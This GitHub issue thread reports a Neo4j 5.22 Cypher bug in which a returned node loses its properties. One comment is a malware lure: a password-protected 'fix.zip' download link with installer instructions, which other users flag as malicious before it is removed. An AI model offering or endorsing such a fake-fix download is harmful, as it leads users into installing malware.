### ISSUE TITLE
Property of node is missed in return result

### ISSUE THREAD

**Issue by ljhhuxiaoba** [neo4j/neo4j#13514]
I execute a query on my empty neo4j database ,and get wrong result.

Neo4j version: 5.22.0-community
operating system: windows 10
API：Cypher version 9
query: FOREACH(a3 IN keys(endNode(NULL))|MERGE p2=(n9{id:173})) MERGE (n10)<-[:T0]-(n11 :L3{k21:'jB', id:176}) SET n11.k=null RETURN n11 AS a5 UNION OPTIONAL MATCH p2=() DETACH DELETE p2 RETURN 1 AS a5 SKIP 0

Expected behavior:
the node "n11" which is returned in result should has properties "{k21:'jB', id:176}".

Actual behavior:
the node "n11" which is returned in result has no property even label.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ljhhuxiaoba** [comment]
@swaggy111 Is this a fix for this problem?

**Comment by flyinghead** [comment]
This is a malicious file. Don't download: https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a

**Comment by parnmatt** [comment]
Thanks @flyinghead for that quick observation. That user has been reported, and GitHub has taken action, and the offending comment has been removed.

@ljhhuxiaoba thanks for reaching out, I have tagged the issue for visibility with the relevant team.

**Comment by inmost-light** [comment]
@ljhhuxiaoba Thank you for reporting, this should be fixed in 5.24.
